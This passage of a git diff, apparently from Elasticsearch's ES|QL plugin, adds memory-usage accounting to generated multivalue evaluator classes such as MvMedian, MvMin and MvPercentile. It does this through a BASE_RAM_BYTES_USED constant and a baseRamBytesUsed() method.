EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxLongEvaluator.java index 2c9e89a5d3c2a..6874aa6f942b4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMaxLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxLongEvaluator.class); + public MvMaxLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationDoubleEvaluator.java index a94f92f203e9a..314acd60d52b8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMedianAbsoluteDeviationDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianAbsoluteDeviationDoubleEvaluator.class); + public MvMedianAbsoluteDeviationDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -183,6 +186,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationIntEvaluator.java index 4fb12ff939a31..eced397e948c7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMedianAbsoluteDeviationIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianAbsoluteDeviationIntEvaluator.class); + public MvMedianAbsoluteDeviationIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -183,6 +186,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationLongEvaluator.java index 92c87dd6df912..c437ed6dec234 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMedianAbsoluteDeviationLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianAbsoluteDeviationLongEvaluator.class); + public MvMedianAbsoluteDeviationLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -183,6 +186,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationUnsignedLongEvaluator.java index 657e98c0e4d01..5d700e70783d4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianAbsoluteDeviationUnsignedLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMedianAbsoluteDeviationUnsignedLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianAbsoluteDeviationUnsignedLongEvaluator.class); + public MvMedianAbsoluteDeviationUnsignedLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -183,6 +186,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianDoubleEvaluator.java index 14ca0c301159f..a8da407463950 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMedianDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianDoubleEvaluator.class); + public MvMedianDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianIntEvaluator.java index 0f3aa297ae521..efe437e5f5959 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMedianIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianIntEvaluator.class); + public MvMedianIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianLongEvaluator.java index 1af845514baf9..4e9cec6190e80 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMedianLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianLongEvaluator.class); + public MvMedianLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianUnsignedLongEvaluator.java index edc68673d3f4c..1f8deaac9110e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMedianUnsignedLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMedianUnsignedLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMedianUnsignedLongEvaluator.class); + public MvMedianUnsignedLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBooleanEvaluator.java index 3a3f87a518f20..e8dbc5a28f183 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMinBooleanEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinBooleanEvaluator.class); + public MvMinBooleanEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBytesRefEvaluator.java index a8258c86a3f42..20967a20c9abf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinBytesRefEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -18,6 +19,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMinBytesRefEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinBytesRefEvaluator.class); + public MvMinBytesRefEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -134,6 +137,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinDoubleEvaluator.java index 14656910b7c7b..0a5ae6721012b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMinDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinDoubleEvaluator.class); + public MvMinDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinIntEvaluator.java index 36c3682dc3c0a..a9f2504cb669f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMinIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinIntEvaluator.class); + public MvMinIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinLongEvaluator.java index 0bcfdf0036e52..ef438584a1de4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMinLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMinLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMinLongEvaluator.class); + public MvMinLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPSeriesWeightedSumDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPSeriesWeightedSumDoubleEvaluator.java index 11864b18a65d4..c0c8e022e57e5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPSeriesWeightedSumDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPSeriesWeightedSumDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.function.Function; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.Page; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvPSeriesWeightedSumDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvPSeriesWeightedSumDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator block; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += block.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock blockBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileDoubleEvaluator.java index 014e9230ce4ed..074b862560272 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.function.Function; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.Page; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvPercentileDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvPercentileDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator values; @@ -53,6 +56,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += values.baseRamBytesUsed(); + baseRamBytesUsed += percentile.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valuesBlock, DoubleBlock percentileBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileIntegerEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileIntegerEvaluator.java index 63f16bc6f7466..f7c13b7093627 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileIntegerEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileIntegerEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.function.Function; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvPercentileIntegerEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvPercentileIntegerEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator values; @@ -54,6 +57,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += values.baseRamBytesUsed(); + baseRamBytesUsed += percentile.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock valuesBlock, DoubleBlock percentileBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileLongEvaluator.java index c5d2232f52e22..b607ee7aaf290 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvPercentileLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.function.Function; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvPercentileLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvPercentileLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator values; @@ -54,6 +57,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += values.baseRamBytesUsed(); + baseRamBytesUsed += percentile.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valuesBlock, DoubleBlock percentileBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBooleanEvaluator.java index a0d8274a1dead..222a1c6a6f5df 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBooleanEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.IntBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvSliceBooleanEvaluator implements 